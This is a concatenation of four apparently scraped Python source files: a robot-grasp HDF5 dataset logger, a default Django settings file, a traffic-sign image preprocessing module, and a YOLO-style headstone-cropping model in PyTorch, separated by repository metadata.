Filter_0 = 1    # keep-probability for class-2 (0 degree) success samples
mm = 10000      # depth clamp: readings above this are zeroed (units unverified — TODO confirm)
# Divide origin angle into 4 categories
# prediction: list with length 4
# | index  | tool |
# | ---    | ---  |
# | 0      | gripper with -90 deg |
# | 1      | gripper with -45 deg |
# | 2      | gripper with 0 deg  |
# | 3      | gripper with 45 deg |
def angle_class_4(theta_):
    """Map a grasp angle in degrees to one of 4 discrete gripper classes.

    Class layout (see the table above): 2 -> ~0 deg, 1 -> ~45 deg,
    0 -> ~90 deg, 3 -> ~135 deg; angles near 180 wrap back to class 2
    (same gripper pose as 0 deg).

    Fix: boundary angles (exact odd multiples of 22.5) and theta_ == 180
    previously fell through every branch and returned None; the closed-form
    binning below assigns them to the next bin instead.  All integer inputs
    in [0, 180) map exactly as before.
    """
    # Shift by half a bin, bucket into 45-degree sectors, wrap modulo 4.
    sector = int((theta_ + 22.5) // 45) % 4
    # sector 0 -> 0 deg, 1 -> 45 deg, 2 -> 90 deg, 3 -> 135 deg
    return (2, 1, 0, 3)[sector]
def json2action(idx, do, i=0):
    """Read the labelme annotation of episode `idx` and return (row, col, angle).

    `do` == 'bad' selects the second annotation shape (the failed grasp);
    the returned angle is an integer number of degrees in [0, 180).
    """
    if do == 'bad':
        i = 1
    json_path = Path + '/episode_' + idx + '/rgb/rgb_' + idx + '_0.json'
    with open(json_path, "r") as handle:
        annotation = json.load(handle)
    points = annotation['shapes'][i]['points']
    # Grasp centre = midpoint of the two annotated corner points.
    x = int((int(points[0][0]) + int(points[1][0])) / 2)
    y = int((int(points[0][1]) + int(points[1][1])) / 2)
    dx = points[0][0] - points[1][0]
    dy = points[0][1] - points[1][1]
    # Mirror into the upper half-plane so the angle lands in [0, 180).
    if dy > 0:
        dx = -dx
    dy = abs(dy)
    if dy < 0.001:
        # Essentially horizontal line: treat as 0 degrees.
        theta = 0
    else:
        theta = math.atan2(dy, dx)
    theta = int(math.degrees(theta))
    return y, x, theta
def logger(path, File_name):
    """Walk the episode folders under `path` and write RL transitions
    (state, action, reward, next_state) into the HDF5 file `File_name`.

    Mutates the module-level `count` list: count[0] counts success
    transitions written, count[1] fail transitions.
    """
    name_list = os.listdir(path)
    with h5py.File(File_name,'w') as f:
        for name in name_list:
            num = name.split('_')[1]
            # Success action
            y, x, theta = json2action(num, 'good')
            a_t = angle_class_4(theta)
            # Failed image
            yf, xf, thetaf = json2action(num, 'bad')
            a_tf = angle_class_4(thetaf)
            # state image (BGR -> RGB via channel reorder, resized to 224x224)
            color = cv2.imread(path+'/episode_'+num+'/rgb/rgb_'+num+'_0.jpg')
            color = color[:,:,[2,1,0]]
            color = cv2.resize(color, (224,224))
            depth = np.load(path+'/episode_'+num+'/depth/depth_'+num+'_0.npy')
            depth[ depth > mm ] = 0
            # next state image
            color2 = cv2.imread(path+'/episode_'+num+'/rgb/rgb_'+num+'_1.jpg')
            color2 = color2[:,:,[2,1,0]]
            color2 = cv2.resize(color2, (224,224))
            depth2 = np.load(path+'/episode_'+num+'/depth/depth_'+num+'_1.npy')
            depth2[ depth2 > mm ] = 0
            # Randomly sub-sample class-2 (0 degree) successes to balance classes.
            if a_t == 2:
                no_Filter_0 = True if random.random() < Filter_0 else False
            else:
                no_Filter_0 = True
            if no_Filter_0:
                # ------------------------------Success transition------------------------------ #
                g1=f.create_group("iter_"+num)
                g1["reward"] = np.array([5])
                g1["origin_theta"] = np.array([theta])
                g1["action"] = np.array([a_t, int(y), int(x)])
                # Sanity check: actions must lie inside the 224x224 resized image.
                if (int(y)>224) or (int(x)>224):
                    print('The image shape in '+name+' is wrong !')
                # Get state
                g2 = g1.create_group("state")
                g2.create_dataset('color', (224,224,3), data=color)
                g2.create_dataset('depth', (224,224), data=depth)
                # Get next state
                g3 = g1.create_group("next_state")
                g3.create_dataset('color', (224,224,3), data=color2)
                g3.create_dataset('depth', (224,224), data=depth2)
                g3["empty"] = np.array([True])
                count[0] += 1
                # ------------------------------Fail transition------------------------------ #
                # Fail transitions reuse the *initial* image for both state and
                # next_state (the failed grasp does not change the scene).
                Do = True if random.random() < ratio else False
                if Do:
                    g1=f.create_group("iter_"+num+"_2")
                    # Get state
                    g1["reward"] = np.array([-5])
                    g1["origin_theta"] = np.array([thetaf])
                    g1["action"] = np.array([a_tf, int(yf), int(xf)])
                    g2 = g1.create_group("state")
                    g2.create_dataset('color', (224,224,3), data=color)
                    g2.create_dataset('depth', (224,224), data=depth)
                    # Get next state
                    g3 = g1.create_group("next_state")
                    g3.create_dataset('color', (224,224,3), data=color)
                    g3.create_dataset('depth', (224,224), data=depth)
                    g3["empty"] = np.array([False])
                    count[1] += 1
    print('Done')
File_name = '/home/austin/Grasp_drl/grasp/src/sean_approach/datasets/Logger_v1.hdf5'
logger(Path, File_name)
id = 'iter_725'  # sample transition used for the sanity-check dump below
# Check: re-open the file and print/plot one transition.
# NOTE(review): `Dataset.value` is deprecated and removed in h5py >= 3.0;
# use `ds[()]` instead if the h5py version is upgraded.
f = h5py.File(File_name)
print('Get ',len(f.keys()), ' transitions')
print('Success : ',count[0], ' Fail : ', count[1])
print('========================')
group = f[id]
for key in group.keys():
    print(key)
print('========================')
print(group['state'])
print(group['action'])
print(group['reward'])
print(group['next_state'])
print('========================')
for key in group['next_state']:
    print(key)
color = f[id+'/state/color'].value
depth = f[id+'/state/depth'].value
colorn = f[id+'/next_state/color'].value
depthn = f[id+'/next_state/depth'].value
print('========================')
print(group['next_state/empty'])
em = group['next_state/empty']
print(em.value)
print(color.shape)
print(depth.shape)
action = group['action']
reward = group['reward']
theta = group['origin_theta']
print(action.value)
print(reward.value)
print(theta.value)
# Show state / next_state colour and depth images side by side.
_, axarr = plt.subplots(2,2)
axarr[0][0].imshow(color)
axarr[0][1].imshow(depth)
axarr[1][0].imshow(colorn)
axarr[1][1].imshow(depthn)
plt.show()
|
[
"sdnd93612@gmail.com"
] |
sdnd93612@gmail.com
|
ecf76394a1017c48ff5b7ab93dc3fb8c7fc165ab
|
14cae788e05904b0305005e7818f9a8c0fba53a6
|
/miniAPI/settings.py
|
b44062c08a812441c82e887bf5354b5f6f776a7c
|
[] |
no_license
|
hanifsarwary/mini-api
|
acca432ec8733830b0a30266cd7c3e0bd0deeb6a
|
2625aea042390efb3dfe580cea22e89d9ee3dde8
|
refs/heads/master
| 2023-03-28T05:36:21.678651
| 2021-03-26T07:30:45
| 2021-03-26T07:30:45
| 351,678,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,086
|
py
|
"""
Django settings for miniAPI project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control — move it to an
# environment variable before any real deployment.
SECRET_KEY = ')_^(8g#-irc=#7^p3&dpv27u$%%m1a1(&3k=k3012#ay_5h-#i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list: only localhost is served while DEBUG is True.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'miniAPI.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'miniAPI.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"muhammad.hanif@synavos.com"
] |
muhammad.hanif@synavos.com
|
8af1c52de31314b33e3ad6ab51f610c75600a88a
|
0cde0ff3ae5d818786e4b7c103939ea5a73ff146
|
/processor.py
|
e3d299c3a0c80a31532d34d1c6ed42cd962d7ff6
|
[] |
no_license
|
peteratt/traffic-signs
|
d4985b085f81b49eeef7f8ce498ba69e825c20be
|
17d227129999fc2c2e63293ae68dbeaabc93d98c
|
refs/heads/master
| 2021-01-11T19:52:10.855749
| 2017-01-29T23:40:42
| 2017-01-29T23:40:42
| 79,411,505
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,455
|
py
|
import cv2
import numpy as np
import math
import random
### Preprocess the data here.
### Feel free to use as many code cells as needed.
def get_n_img_per_class(labels):
    """Count consecutive runs of identical labels.

    Assumes `labels` is grouped (sorted) by class.  Mirrors the original
    behaviour of starting the scan at class 0: when the first label is
    nonzero, a leading 0 count is emitted before it.

    Fix: an empty input now returns [] instead of the spurious [0].
    """
    if len(labels) == 0:
        return []
    n_img_per_class = []
    current_y = 0
    current_count = 0
    for y in labels:
        if y == current_y:
            current_count += 1
        else:
            # Run boundary: flush the previous class's count.
            current_y = y
            n_img_per_class.append(current_count)
            current_count = 1
    # Flush the final run.
    n_img_per_class.append(current_count)
    return n_img_per_class
def extract_validation_set(X_train, y_train):
    """Move ~10% of each class (chosen at random) into a validation set.

    Assumes y_train is grouped by class (see get_n_img_per_class).
    Returns a dict with keys 'X_train', 'y_train', 'X_validate', 'y_validate'.
    NOTE(review): uses np.random without a fixed seed, so the split is
    nondeterministic unless the caller seeds numpy.

    Fix: indices are now collected across all classes and deleted in a
    single pass.  The previous version called np.delete after each class
    with indices computed against the *original* arrays, so once earlier
    rows had been removed, every later deletion removed the wrong rows
    (leaking validation samples back into the training set).
    """
    total_images, rows, cols, color_depth = X_train.shape
    n_img_per_class = get_n_img_per_class(y_train)
    # Pick ~10% of each class's (contiguous) index range.
    picked_indices = []
    start_index = 0
    for n_img in n_img_per_class:
        n_picks = int(n_img / 10)
        index_interval = list(range(start_index, start_index + n_img))
        picks = np.random.choice(index_interval, n_picks, replace=False)
        picked_indices.extend(np.sort(picks))
        start_index = start_index + n_img
    picked_indices = np.array(picked_indices, dtype=int)
    # Single gather/delete keeps all indices valid against the original arrays.
    X_validate = np.take(X_train, picked_indices, 0)
    y_validate = np.take(y_train, picked_indices)
    new_X_train = np.delete(X_train, picked_indices, 0)
    new_y_train = np.delete(y_train, picked_indices)
    return {
        'X_train': new_X_train,
        'y_train': new_y_train,
        'X_validate': X_validate,
        'y_validate': y_validate
    }
# Taken from https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/expr/preprocessing.py
def _contrast_normalize(X, scale=1., subtract_mean=True, use_std=True, sqrt_bias=10., min_divisor=1e-8):
    """
    Global contrast normalizes by (optionally) subtracting the mean
    across features and then normalizes by either the vector norm
    or the standard deviation (across features, for each example).

    Unlike the pylearn2 original, this version first applies CLAHE
    (local contrast normalization) to X, treating it as a 2-D image.

    Parameters
    ----------
    X : ndarray, 2-dimensional
        Design matrix with examples indexed on the first axis and \
        features indexed on the second.  (As called from
        _preprocess_image, X is a single 2-D greyscale image.)
    scale : float, optional
        Multiply features by this const.  Defaults to 1.
    subtract_mean : bool, optional
        Remove the mean across features/pixels before normalizing. \
        Defaults to `True`.
    use_std : bool, optional
        Normalize by the per-example standard deviation across features \
        instead of the vector norm. Defaults to `True`.
    sqrt_bias : float, optional
        Fudge factor added inside the square root. Defaults to 10.
    min_divisor : float, optional
        If the divisor for an example is less than this value, \
        do not apply it. Defaults to `1e-8`.
    Returns
    -------
    Xp : ndarray, 2-dimensional
        The contrast-normalized features.
    Notes
    -----
    `sqrt_bias` = 10 and `use_std = True` (and defaults for all other
    parameters) corresponds to the preprocessing used in [1].
    References
    ----------
    .. [1] A. Coates, H. Lee and A. Ng. "An Analysis of Single-Layer
       Networks in Unsupervised Feature Learning". AISTATS 14, 2011.
       http://www.stanford.edu/~acoates/papers/coatesleeng_aistats_2011.pdf
    """
    assert X.ndim == 2, "X.ndim must be 2"
    scale = float(scale)
    assert scale >= min_divisor
    # First, local contrast normalization
    # NOTE(review): cv2 CLAHE expects an 8- or 16-bit single-channel image;
    # presumably X arrives as uint8 greyscale here — confirm against caller.
    clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
    X = clahe.apply(X)
    # Note: this is per-example mean across pixels, not the
    # per-pixel mean across examples. So it is perfectly fine
    # to subtract this without worrying about whether the current
    # object is the train, valid, or test set.
    mean = X.mean(axis=1)
    if subtract_mean:
        X = X - mean[:, np.newaxis]  # Makes a copy.
    else:
        X = X.copy()
    if use_std:
        # ddof=1 simulates MATLAB's var() behaviour, which is what Adam
        # Coates' code does.
        ddof = 1
        # If we don't do this, X.var will return nan.
        if X.shape[1] == 1:
            ddof = 0
        normalizers = np.sqrt(sqrt_bias + X.var(axis=1, ddof=ddof)) / scale
    else:
        normalizers = np.sqrt(sqrt_bias + (X ** 2).sum(axis=1)) / scale
    # Don't normalize by anything too small.
    normalizers[normalizers < min_divisor] = 1.
    X /= normalizers[:, np.newaxis]  # Does not make a copy.
    return X
def _rotate_image(img, angle):
    """Rotate `img` by `angle` degrees about its centre, keeping the canvas size."""
    height, width = img.shape[0], img.shape[1]
    rotation = cv2.getRotationMatrix2D((width / 2, height / 2), angle, 1)
    return cv2.warpAffine(img, rotation, (width, height))
def _translate_image(img, translation_x, translation_y):
    """Shift `img` by (translation_x, translation_y) pixels, same canvas size."""
    height, width = img.shape[0], img.shape[1]
    shift = np.float32([[1, 0, translation_x], [0, 1, translation_y]])
    return cv2.warpAffine(img, shift, (width, height))
def _scale_image(img, scale):
    """Scale `img` by `scale`, then crop or pad back to a 32x32 canvas.

    Upscaling crops the central 32x32 window; downscaling pads the border
    with black pixels so the output stays 32x32.
    """
    res = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
    new_rows = res.shape[0]
    new_cols = res.shape[1]
    if (scale > 1):
        # Larger than 32x32: take the central 32x32 crop.
        res = res[int(new_rows / 2) - 16:int(new_rows / 2) + 16, int(new_cols / 2) - 16:int(new_cols / 2) + 16]
    else:
        # Smaller than 32x32: pad back up; ceil/floor split handles odd deficits.
        res = cv2.copyMakeBorder(res, math.ceil((32 - new_rows) / 2), int((32 - new_rows) / 2),
                                 math.ceil((32 - new_cols) / 2), int((32 - new_cols) / 2), cv2.BORDER_CONSTANT,
                                 value=[0, 0, 0])
    return res
def _add_jitter(image):
    """Return a randomly scaled, rotated and translated copy of `image`.

    Scale in [0.9, 1.1], rotation in [-15, 15] degrees, translation in
    [-2, 2) pixels per axis.  The random calls run in the same order as
    before so a seeded RNG reproduces identical jitter.
    """
    jittered = _scale_image(image, random.uniform(0.9, 1.1))
    jittered = _rotate_image(jittered, random.uniform(-15.0, 15.0))
    return _translate_image(jittered, random.randrange(-2, 2), random.randrange(-2, 2))
def _preprocess_image(X):
    """Convert each RGB image in X to greyscale, then contrast-normalize it."""
    # Preliminary: transform all images into YUV format, only take Y
    greyscale = np.array([cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) for img in X])
    # Global and local contrast normalization, image by image.
    return np.array([_contrast_normalize(img) for img in greyscale])
# Load data
def _flatten_dataset(X):
shape = X.shape
n_features = 1
for i in range(1, len(shape)):
n_features *= shape[i]
return np.reshape(X, (-1, n_features))
def _one_hot(y, n_labels):
input_length = len(y)
one_hot_encoded = np.zeros((input_length, n_labels))
one_hot_encoded[np.arange(input_length), y] = 1
return one_hot_encoded
def process_data(train, test):
    """Full preprocessing pipeline: validation split, jitter augmentation,
    flattening and one-hot encoding.

    `train` and `test` are dicts with 'features' (N, H, W, C arrays) and
    'labels'.  Returns a nested dict {'train'|'validate'|'test': {'X', 'y'}}.
    NOTE(review): the jitter step uses the `random` module without seeding,
    so output is nondeterministic unless the caller seeds it.
    """
    X_train, y_train = train['features'], train['labels']
    X_test, y_test = test['features'], test['labels']
    n_classes = np.amax(y_train) + 1
    # -------------- DATA PREP PIPELINE
    # First, we do global and local contrast normalization for the images
    # NOTE(review): normalization is currently disabled (commented out).
    # X_train = preprocess_image(X_train)
    # X_test = preprocess_image(X_test)
    print("train and test data has been pre-processed")
    # Then, validation set selected at random per class
    # Validation set extraction:
    validate = extract_validation_set(X_train, y_train)
    X_train_remaining = validate['X_train']
    y_train_remaining = validate['y_train']
    X_validate = validate['X_validate']
    y_validate = validate['y_validate']
    print("validation data has been selected")
    # After we have the validation set, we generate jitter images of the remanining training set:
    # Duplicate the X_train list by adding jitter (doubles the training set).
    # TODO: check if compensating for amount of features per label helps
    X_jitter = np.array(list(map(_add_jitter, X_train_remaining)))
    y_jitter = y_train_remaining
    X_train_with_jitter = np.append(X_train_remaining, X_jitter, 0)
    y_train_with_jitter = np.append(y_train_remaining, y_jitter)
    print("added jitter data to dataset")
    # Flatten features
    X_train_with_jitter = _flatten_dataset(X_train_with_jitter)
    X_validate = _flatten_dataset(X_validate)
    X_test = _flatten_dataset(X_test)
    # One-hot encode labels
    y_train_with_jitter = _one_hot(y_train_with_jitter, n_classes)
    y_validate = _one_hot(y_validate, n_classes)
    y_test = _one_hot(y_test, n_classes)
    return {
        'train': {
            'X': X_train_with_jitter,
            'y': y_train_with_jitter
        },
        'validate': {
            'X': X_validate,
            'y': y_validate
        },
        'test': {
            'X': X_test,
            'y': y_test
        }
    }
|
[
"pedro@navdy.com"
] |
pedro@navdy.com
|
c499c7b4d61d5a05ae856855cb303c72f6d55603
|
5393fa44114326a42dbb3a731f6ce3f1f80fd8d9
|
/cropping.py
|
d2c1b7308b956b9dbeaf4690903338ae66bcaeaf
|
[] |
no_license
|
CHDRucf/Headstone-Photo-Processing
|
ae3968c9412d29c5062c2b7b0c5e9ba3b24f4421
|
aafdcd90f1668dd11bfe8d90129e86a3ad4df82d
|
refs/heads/main
| 2023-08-05T10:14:47.177048
| 2021-09-24T18:37:43
| 2021-09-24T18:37:43
| 410,066,787
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,150
|
py
|
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from collections import Counter
import cv2
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
import torch.utils.data as Data
import torchvision
from PIL import Image,ImageOps
import os
from torch.utils.data import DataLoader
from collections import Counter
#this is the darknet architecture from the original paper; we may use resnet50 in the future
#based on the training performance, but for now, we will follow the original paper
class Block(nn.Module):
    """Conv2d -> BatchNorm2d -> LeakyReLU(0.1) building block of the backbone."""

    def __init__(self, in_channels, out_channels, **kwargs):
        super(Block, self).__init__()
        # bias=False because the following BatchNorm re-centres activations anyway.
        self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
        self.batchnorm = nn.BatchNorm2d(out_channels)
        self.leakyrelu = nn.LeakyReLU(0.1)

    def forward(self, x):
        out = self.conv(x)
        out = self.batchnorm(out)
        return self.leakyrelu(out)
class CROPPING_MODEL(nn.Module):
    """YOLOv1-style detector: darknet backbone + fully connected head.

    Architecture spec entries (consumed by original_darknet):
      tuple  -> one Block as (kernel_size, out_channels, stride, padding)
      "Max_Pooling" -> 2x2 max pool, stride 2
      list   -> [conv1_tuple, conv2_tuple, repeat_count]
    """
    def __init__(self, in_channels=3, **kwargs):
        super(CROPPING_MODEL, self).__init__()
        self.architecture = [(7, 64, 2, 3),"Max_Pooling",(3, 192, 1, 1),"Max_Pooling",(1, 128, 1, 0),(3, 256, 1, 1),(1, 256, 1, 0),(3, 512, 1, 1),
            "Max_Pooling",[(1, 256, 1, 0), (3, 512, 1, 1), 4],(1, 512, 1, 0),(3, 1024, 1, 1),"Max_Pooling",[(1, 512, 1, 0), (3, 1024, 1, 1), 2],
            (3, 1024, 1, 1),(3, 1024, 2, 1),(3, 1024, 1, 1),(3, 1024, 1, 1),]
        self.in_channels = in_channels
        self.darknet = self.original_darknet(self.architecture)
        self.fcs = self.build_fcs(**kwargs)
    def forward(self, x):
        # Backbone features, flattened per sample, then the FC head.
        x = self.darknet(x)
        return self.fcs(torch.flatten(x, start_dim=1))
    def original_darknet(self, architecture):
        """Build the convolutional backbone from the architecture spec."""
        layers = []
        in_channels = self.in_channels
        for x in architecture:
            if type(x) == tuple:
                layers += [Block(in_channels, x[1], kernel_size=x[0], stride=x[2], padding=x[3])]
                in_channels = x[1]
            elif type(x) == str:
                # Any string entry means a 2x2/2 max pool.
                layers += [nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))]
            elif type(x) == list:
                conv1 = x[0]
                conv2 = x[1]
                repeat_layers = x[2]
                for _ in range(repeat_layers):
                    layers += [Block(in_channels,conv1[1],kernel_size=conv1[0],stride=conv1[2],padding=conv1[3])]
                    layers += [Block(conv1[1],conv2[1],kernel_size=conv2[0],stride=conv2[2],padding=conv2[3])]
                    in_channels = conv2[1]
        return nn.Sequential(*layers)
    def build_fcs(self, grid_number, bounding_box_number, number_classes):
        """Head emitting S*S*(C + B*5) outputs: per-cell class scores plus
        B boxes of (confidence, x, y, w, h)."""
        S, B, C = grid_number, bounding_box_number, number_classes
        return nn.Sequential(nn.Flatten(),
                             nn.Linear(1024 * S * S, 4096),
                             nn.Dropout(0.25),
                             nn.LeakyReLU(0.1),
                             nn.Linear(4096, S * S * (C + B * 5)))
#load the trained CNN model to generate the prediction boxes
#cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
#cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2)
#cropping_process_model.load_state_dict(torch.load("model_cropping.pt",map_location=torch.device('cpu')))
#cropping_process_model.eval()
# Lazily-initialised singleton: cropping_process() builds and loads the
# model on first use instead of at import time.
cropping_process_model=None
# the function will take one single image with size (h,w,c), and predict the bounding box with also (h',w',c) shape image
def cropping_process(rotated_image, buffer):
global cropping_process_model
if cropping_process_model is None:
cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
cropping_process_model.load_state_dict(torch.load("model_cropping_new333.pt",map_location=torch.device('cpu')))
cropping_process_model.eval()
#load the trained CNN model to generate the prediction boxes
# cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
#cropping_process_model.load_state_dict(torch.load("model_cropping_new333.pt",map_location=torch.device('cpu')))
#cropping_process_model.eval()
# we may instead load the whole entire trained model
#cropping_process_model = torch.load("tttmp.pt",map_location=torch.device('cpu'))
#cropping_process_model.eval()
# we observed the original paper that split the image into 7*7 grids, each grid will predict two boxes and choose the
# better one, in our case, only two classes will be predicted;
S=7
B=2
C=2
#assign the input rotated image to image
image = rotated_image
#the way PIL read image has rotatded the original image 90 degree, so the function exif_transpose() will transpose it back
#it could be different if you read image by cv2 library;
image = ImageOps.exif_transpose(image)
output_image = image
#resize the image to 448*448*3 to fit the CNN model
image = image.resize((448,448))
#initial the image as np array
data = np.array(image)
#switch the dimension of the image from 448*448*3 to 3*448*448 to fit the model
data = np.rollaxis(data, 2, 0)
#convert the np array to torch tensor
data = torch.tensor(data)
data = data.float()
data = data/255
# add one demension to the data from 3*448*448 to 1*3*448*448
data=data.unsqueeze(0)
#print("the shape of image now is ")
#print(data.shape)
#plug the data to trained model to generate the predictions which will has a shape of
predictions = cropping_process_model(data)
#predictions = predictions.to("cpu")
#reshape the prediction to the shape of 1*7*7*12
predictions = predictions.reshape(1, S, S, C+B*5)
#print(predictions.shape)
# getting the predicted value of the first bounding box
front_bounding_box = predictions[:,:,:, 3:7]
#print(front_bounding_box.shape)
# getting the predicted value of the second bounding box
back_bounding_box = predictions[:,:,:, 8:12]
#print(back_bounding_box.shape)
#compare the confidence score of two bounding boxes that contain an object, and pick the better one
has_object_scores = torch.cat((predictions[:,:,:, 2].unsqueeze(0), predictions[:,:,:, 7].unsqueeze(0)), dim=0)
#print(has_object_scores.shape) (2*7*7*1)
best_box = has_object_scores.argmax(0).unsqueeze(-1)
#print(best_box) (1*7*7*1)
best_boxes = front_bounding_box * (1 - best_box) + best_box * back_bounding_box
#print(best_boxes.shape) (1*7*7*4)
order_cells = torch.arange(7).repeat(1, 7, 1).unsqueeze(-1)
#print(order_cells)
x = 1 / S * (best_boxes[:,:,:, :1] + order_cells)
y = 1 / S * (best_boxes[:,:,:, 1:2] + order_cells.permute(0, 2, 1, 3))
w_y = 1 / S * best_boxes[:,:,:, 2:4]
#convert the prediction value and concat the bounding box
iteration_of_bounding_boxes = torch.cat((x, y, w_y), dim=-1)
#print(iteration_of_bounding_boxes.shape)
predicted_class = predictions[:,:,:, :2].argmax(-1).unsqueeze(-1)
#keep the best score for containing an object
best_confidence = torch.max(predictions[:,:,:, 2], predictions[:,:,:, 7]).unsqueeze(-1)
#combine the class score, object score, and the better coordinates
combined_new_predictions = torch.cat(
(predicted_class, best_confidence, iteration_of_bounding_boxes), dim=-1
)
#reshape the matrix for iteration purpose
converted_pred = combined_new_predictions.reshape(1, S * S, -1)
converted_pred[:,:, 0] = converted_pred[:,:, 0].long()
#print(converted_pred.shape)
bboxes = []
for i in range(S * S):
bboxes.append([x.item() for x in converted_pred[0, i, :]])
#we will assume the possibility has to be larger than 0.5 to have an object
threshold = 0.5
new_bboxes = []
for box in bboxes:
if box[1] >= threshold:
new_bboxes.append(box)
#print(bboxes)
# if all the prediction posibility of containing an object is less than 0.5, we will give a minimum prediction 0.3 and
#find the maximum posibility box from all the boxes;
# if there are more than two boxes that is larger posibility than threshold, we will filter out the smaller ones for each type
# to make sure each type of headstones will be showed only once
max_box = 0.0
max_regular_headstone = 0.0
max_outliner_headstone = 0.0
tmp_max_regular_headstone = []
tmp_max_outliner_headstone = []
new_new_bboxes = []
if len(new_bboxes) == 0:
for box in bboxes:
if box[1] > max_box and box[1]>0.3:
#if box[1] > max_box:
#print(box[1])
max_box = box[1]
tmp_max_box = box
new_bboxes.append(tmp_max_box)
new_new_bboxes = new_bboxes
elif len(new_bboxes)>=2:
for box in new_bboxes:
if box[0] == 0.0:
if box[1] > max_regular_headstone:
max_regular_headstone = box[1]
tmp_max_regular_headstone = box
else:
if box[1] > max_outliner_headstone:
max_outliner_headstone = box[1]
tmp_max_outliner_headstone = box
if tmp_max_regular_headstone:
new_new_bboxes.append(tmp_max_regular_headstone)
if tmp_max_outliner_headstone:
new_new_bboxes.append(tmp_max_outliner_headstone)
if len(new_bboxes)==1:
new_new_bboxes = new_bboxes
bboxes = new_new_bboxes
data=data.squeeze(0)
data = data.permute(1,2,0)*255
#plt.imshow(data)
#print(data.int())
data = data.int()
im = np.array(output_image)
#print(im.shape)
height = im.shape[0]
width = im.shape[1]
#fig, ax = plt.subplots(1)
# show the original image
#ax.imshow(im)
cropped_headstones = []
#assume we might have multiple objects (really rare)
for box in bboxes:
box = box[2:]
upper_left_x = box[0] - box[2] / 2
upper_left_y = box[1] - box[3] / 2
#rect = patches.Rectangle((upper_left_x * width, upper_left_y * height),box[2] * width,box[3] * height,linewidth=1.5,edgecolor="black",facecolor="none")
# we add a max function here because the predicted box maybe out of the bounary of the original image
# we add a max function here because the predicted box maybe out of the bounary of the original image
x_left_absolute = max(int(upper_left_y * height)-buffer,0)
#print(x_left_absolute)
x_right_absolute = min(int(upper_left_y*height+box[3]*height)+buffer,height-1)
#print(x_right_absolute)
y_left_absolute = max(int(upper_left_x * width)-buffer,0)
#print(y_left_absolute)
y_right_absolute = min(int(upper_left_x * width+box[2] * width)+buffer,width-1)
#print(y_right_absolute)
headstone=im[x_left_absolute:x_right_absolute,y_left_absolute:y_right_absolute,:]
#tmp=Image.fromarray(headstone)
#plt.imshow(tmp)
cropped_headstones.append(headstone)
#print(rect)
#print(bboxes)
#ax.add_patch(rect)
#print(headstone.shape)
#plt.show()
# the function will return a list that contains the cropped headstone, but for testing purpose, we will just let it showed
#return cropped_headstones
#print(len(cropped_headstones))
#for headstone in cropped_headstones:
#cropped=Image.fromarray(headstone)
#we can store the cropped headstone to the folder by
#cropped.save('cropped_image.jpg')
#for testing, we just want to show the result
#plt.imshow(cropped)
# the variable OCR_input_cropped_headstone will be sent to OCR() function
#OCR_input_cropped_headstone = np.array(headstone)
return cropped_headstones[0]
# Script entry point: one-shot demo of the headstone-cropping pipeline.
# `Image` (PIL) and `cropping_process` are defined elsewhere in this file /
# its imports.
if __name__ == "__main__":
